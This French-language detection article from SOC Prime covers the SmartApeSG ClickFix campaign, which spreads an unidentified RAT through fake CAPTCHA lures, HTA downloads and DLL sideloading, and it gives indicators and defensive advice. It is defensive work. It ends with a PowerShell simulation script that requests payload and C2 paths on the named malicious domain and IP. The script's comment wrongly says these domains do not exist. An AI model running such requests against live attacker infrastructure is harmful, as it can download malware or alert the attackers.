SOC Prime Bias: Élevé

05 Aug 2026 07:42 UTC

SmartApeSG Diffuse un RAT Inconnu par des Leurres ClickFix

Author Photo
SOC Prime Team linkedin icon Suivre
SmartApeSG Diffuse un RAT Inconnu par des Leurres ClickFix
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Résumé

La campagne SmartApeSG utilise la technique ClickFix pour tromper les utilisateurs en leur faisant exécuter des commandes malveillantes à travers de fausses pages CAPTCHA ou de vérification humaine. Cette action lance un fichier HTA qui télécharge et extrait une archive ZIP malveillante. La charge finale est un cheval de Troie d’accès à distance (RAT) non identifié qui s’appuie sur le chargement latéral de DLL pour établir une persistance et communiquer avec son infrastructure de commande et de contrôle (C2).

Enquête

L’enquête a inclus l’analyse du trafic HTTPS, des fichiers PCAP et des archives malveillantes liées à l’activité de SmartApeSG. Les chercheurs ont identifié du JavaScript malveillant injecté dans des sites Web légitimes et ont retracé la chaîne d’infection d’une commande injectée dans le presse-papiers à la connexion finale avec le C2. Le RAT a été observé en train de communiquer avec une adresse IP externe sur le port 443 en utilisant du trafic chiffré.

Atténuation

Les organisations devraient utiliser le filtrage Web pour bloquer les domaines malveillants connus, y compris pewtercanto[.]top and deltaode[.]com. Les utilisateurs devraient être formés à reconnaître les méthodes d’ingénierie sociale telles que les faux CAPTCHAs et les instructions ClickFix. Restreindre l’exécution de fichiers HTA et surveiller les processus enfants suspects lancés par les navigateurs ou les commandes Run peut également réduire le risque.

Réponse

Si une activité SmartApeSG est détectée, le point d’extrémité affecté devrait être isolé immédiatement pour interrompre la communication C2. Les enquêteurs devraient examiner les répertoires AppData et Documents pour identifier le RAT et ses mécanismes de persistance. La télémétrie des points d’extrémité devrait également être examinée pour détecter une exécution non autorisée de HTA, une manipulation du presse-papiers et une activité de chargement latéral de DLL.

Flux d’attaque

Exécution de simulation

Prérequis : Le contrôle préalable de télémétrie et baseline doit avoir été validé.

Raisonnement : Cette section détaille l’exécution précise de la technique (TTP) de l’adversaire conçue pour déclencher la règle de détection. Les commandes et le récit DOIVENT refléter directement les TTPs identifiés et viser à générer la télémétrie exacte attendue par la logique de détection. Des exemples abstraits ou non liés mèneront à des erreurs de diagnostic.

  • Narratif et commandes d’attaque : L’adversaire exécute la campagne SmartApeSG ClickFix. Après qu’un utilisateur ait été trompé pour effectuer une action malveillante (souvent une fausse mise à jour du navigateur), le système tente de télécharger un fichier HTA malveillant. Le HTA initie ensuite une connexion à l’infrastructure C2 pour télécharger la charge finale RAT. Pour simuler cela, nous générerons des requêtes réseau qui atteindront les chaînes exactes définies dans la logique de détection : deltaode.compo, deltaode.com/wv, et l’IP 89.124.79.98.

  • Script de test de régression :

     # Script de simulation pour déclencher la règle de détection SmartApeSG
      # Ce script simule les requêtes réseau vers les IoCs spécifiques
    
      $urls = @(
          "https://deltaode.compo/payload.hta",
          "https://deltaode.com/wv/malicious.exe",
          "http://89.124.79.98:443/c2_checkin"
      )
    
      foreach ($url in $urls) {
          Write-Host "Simulation de la requête vers : $url"
          try {
              # Utilisation d'Invoke-WebRequest pour générer la télémétrie réseau
              # Nous utilisons -ErrorAction SilentlyContinue car ces domaines n'existent pas réellement
              Invoke-WebRequest -Uri $url -UseBasicParsing -ErrorAction SilentlyContinue
          } catch {
              Write-Host "Requête échouée (comme prévu), mais la télémétrie devrait être générée."
          }
      }
  • Commandes de nettoyage :

     # Aucun changement permanent n'a été fait au système ; aucun nettoyage n'est requis.
      Write-Host "Simulation terminée. Aucun artefact laissé sur le système."